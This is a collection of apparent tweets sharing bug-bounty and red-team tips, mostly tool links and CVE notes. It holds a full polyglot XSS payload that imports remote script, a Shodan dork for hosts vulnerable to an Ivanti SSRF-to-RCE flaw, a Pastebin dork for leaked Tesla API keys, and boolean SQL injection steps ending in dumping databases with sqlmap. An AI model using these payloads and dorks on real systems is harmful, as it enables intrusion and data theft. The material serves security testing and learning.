🛠️ LOLESXi: Living Off The Land ESXi A comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilized in their operations By @blueteam0ps_ and @wietze https://t.co/LAYtTQMO2i

ONE OF MY BEST XSS ONELINER SUCCESSER MUST TRY :) #bugbountytips

💀 SSRF leading to RCE in Ivanti Connect Secure. (CVE-2024-21893) Dork for Shodan: http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo" #web #cve #ssrf #rce #dork #bug

Use this #XSS payload to pop alert boxes EVERYWHERE! 😎 🏆 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\ https://t.co/GFfWFhdpK2))}//\76-->

🌟SQLi_Sleeps🌟 👉It is a simple script that allow to find SQLi vulnerabilities, obtaining the response time greater than 20 seconds per medium and time-based injection. 📥 https://t.co/OcmjLUDPU9 📥 https://t.co/Pz9cWGL18l #bugbountytip #bugbountytips #ethicalhacking #sqli

Recon Tool: go-dork🔥🔥☄️☄️ #Day5 Go-dork by dwisiswant0 is a powerful and efficient command-line tool written in the Go programming language. It is designed to be the fastest dork scanner available, streamlining the process of conducting advanced Google dork queries. The

One good way to initial access is by using msi Shenanigans , it’s getting popular nowadays by hackers to get initial access, i have written a blog, explaining how can we exploit msi shenanigans. https://t.co/jpgQ4NSFBC #redteaming #malware #initialaccess

I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year entitled "Syscalls via Vectored Exception Handling". https://t.co/VGE7ZQnwGz #redteam

Google Dork to check for Pastebin leaks! 🤓 site:pastebin[.]com ".tesla[.]com" api

Here's 2 tools you can use to effectively find sensitive information in JS files: 1️⃣ Hakrawler - Extracting JavaScript files. 🔗Link : https://t.co/FebhrUA0c6 2️⃣ LinkFinder - Finding Endpoints in JS files. 🔗Link : https://t.co/PM2uVuhQUC Do you use anything else? Let us know

File Upload Cheatsheet Where to find In upload file feature, for example upload photo profile feature How to exploit read also this pdf it conayin a many of ideas 1- https://t.co/GiCuJ2vdS3 by 0xAwali 2- https://t.co/L9H3PGU7AO by ebrahim hegazy

🌟Subdominator🌟 is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. 📥 https://t.co/kR0s4gCt9O #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #GitHub #offsec

Free online tools to identify a city from an uploaded photo using AI: https://t.co/Wad0fr1ZSs https://t.co/dBCTblzmc8 #osint #geoint

GitHub - ImAyrix/fallparams: Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist https://t.co/0edOUEr7oM

if you are testing a payment system or a shop, check the whitepaper that @irsdl had written: https://t.co/7DEJ4XfHzJ #bugbountytips #BugBounty #bugbountytip #bugbounty #Datasecurity #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam

⛔ Bug Bounty Reports Templates ⚡️ https://t.co/FIz2gZ3nP9 ⛔⛔ #bugbountytips #BugBounty #bugbountytip #infosec #CyberSecurity #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks

If your plan is to learn reverse engineering this year check out the resources I collected while learning RE: https://github[dot]com/HACKE-RC/awesome-reversing

CVE-2023-51467: Apache OfBiz Auth Bypass and RCE Severity: critical (CVSS 9.8) Root cause: https://t.co/7XkosqCFKy Mitigation: Upgrade Apache OFBiz Ref: https://t.co/oUWnDXn08a

🚨40,000+ Nuclei templates for security scanning and detection across diverse web applications and services🚨 📥 https://t.co/vXvOXiriP8 #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #ssrf #AEM

SQLi.. 1. original parameter --> content-length:9230 2. inject: and 1=1 # --> content-length:9230 3. inject: and 1=2 # --> content-length:4766 4. Now, sqlmap turn --> Dump the whole databases #bugbountytip #bugbounty #Pentesting